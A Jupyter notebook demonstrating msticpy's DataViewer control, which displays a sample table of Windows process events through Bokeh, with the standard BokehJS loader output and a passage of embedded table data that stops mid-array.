{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# Data Viewer\n", "\n", "This notebook demonstrates the use of the DataViewer control.\n", "\n", "It provides some basic features that let you browse pandas DataFrames more easily:\n", "- Scrollable data viewer taking fixed amount of output cell space\n", "- Sorting data by column\n", "- Column selection\n", "- Data filtering" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "#### Read in some data to demonstrate" ] }, { "cell_type": "code", "execution_count": 1, "metadata": {}, "outputs": [], "source": [ "from msticpy.vis.data_viewer import DataViewer\n", "import pandas as pd\n", "\n", "data = pd.read_csv(\n", " \"./data/processes_on_host.csv\",\n", " index_col=0,\n", " parse_dates=[\"TimeGenerated\"],\n", " infer_datetime_format=True,\n", ")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Use the DataViewer to display a DataFrame" ] }, { "cell_type": "code", "execution_count": 2, "metadata": {}, "outputs": [ { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n var JS_MIME_TYPE = 'application/javascript';\n var HTML_MIME_TYPE = 'text/html';\n var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n var CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n var script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n var cell = handle.cell;\n\n var id = cell.output_area._bokeh_element_id;\n var server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd, {\n iopub: {\n output: function(msg) {\n var id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n var output_area = handle.output_area;\n var output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n var bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n var script_attrs = bk_div.children[0].attributes;\n for (var i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n var toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n var events = require('base/js/events');\n var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(null);\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n if (url in hashes) {\n element.crossOrigin = \"anonymous\";\n element.integrity = \"sha384-\" + hashes[url];\n }\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n var docs_json = {\"10ccfc77-fc95-462a-a396-e33a049da5d1\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1003\"},{\"id\":\"1004\"},{\"id\":\"1005\"},{\"id\":\"1021\"},{\"id\":\"1006\"},{\"id\":\"1007\"},{\"id\":\"1008\"},{\"id\":\"1009\"},{\"id\":\"1010\"},{\"id\":\"1011\"},{\"id\":\"1012\"},{\"id\":\"1013\"},{\"id\":\"1014\"},{\"id\":\"1015\"},{\"id\":\"1016\"},{\"id\":\"1017\"},{\"id\":\"1018\"},{\"id\":\"1019\"}],\"editable\":true,\"height\":550,\"source\":{\"id\":\"1002\"},\"view\":{\"id\":\"1023\"},\"width_policy\":\"max\"},\"id\":\"1024\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1032\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1037\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1042\"},\"field\":\"SubjectDomainName\",\"formatter\":{\"id\":\"1041\"},\"title\":\"SubjectDomainName\",\"width\":9},\"id\":\"1009\",\"type\":\"TableColumn\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1020\",\"type\":\"DateFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1056\"},\"field\":\"ParentProcessName\",\"formatter\":{\"id\":\"1055\"},\"title\":\"ParentProcessName\",\"width\":73},\"id\":\"1016\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1043\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1056\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1028\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1042\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1058\",\"type\":\"StringEditor\"},{\"attributes\":{\"source\":{\"id\":\"1002\"}},\"id\":\"1023\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1053\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1050\"},\"field\":\"TokenElevationType\",\"formatter\":{\"id\":\"1049\"},\"title\":\"TokenElevationType\",\"width\":6},\"id\":\"1013\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1058\"},\"field\":\"TargetLogonId\",\"formatter\":{\"id\":\"1057\"},\"title\":\"TargetLogonId\",\"width\":3},\"id\":\"1017\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1039\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1040\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1033\"},\"field\":\"EventID\",\"formatter\":{\"id\":\"1032\"},\"title\":\"EventID\",\"width\":8},\"id\":\"1005\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1031\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1052\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1062\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1040\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1039\"},\"title\":\"SubjectUserName\",\"width\":16},\"id\":\"1008\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1047\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1031\"},\"field\":\"Account\",\"formatter\":{\"id\":\"1030\"},\"title\":\"Account\",\"width\":26},\"id\":\"1004\",\"type\":\"TableColumn\"},{\"attributes\":{\"editor\":{\"id\":\"1036\"},\"field\":\"Computer\",\"formatter\":{\"id\":\"1035\"},\"title\":\"Computer\",\"width\":15},\"id\":\"1006\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1041\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1046\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1054\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1044\"},\"field\":\"SubjectLogonId\",\"formatter\":{\"id\":\"1043\"},\"title\":\"SubjectLogonId\",\"width\":5},\"id\":\"1010\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1027\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1035\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1052\"},\"field\":\"ProcessId\",\"formatter\":{\"id\":\"1051\"},\"title\":\"ProcessId\",\"width\":5},\"id\":\"1014\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1051\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1059\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1060\"},\"field\":\"SourceComputerId\",\"formatter\":{\"id\":\"1059\"},\"title\":\"SourceComputerId\",\"width\":36},\"id\":\"1018\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1049\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1030\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1029\"},\"field\":\"TenantId\",\"formatter\":{\"id\":\"1028\"},\"title\":\"TenantId\",\"width\":36},\"id\":\"1003\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1029\",\"type\":\"StringEditor\"},{\"attributes\":{\"editor\":{\"id\":\"1034\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1020\"},\"title\":\"TimeGenerated\",\"width\":50},\"id\":\"1021\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1050\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1060\",\"type\":\"StringEditor\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\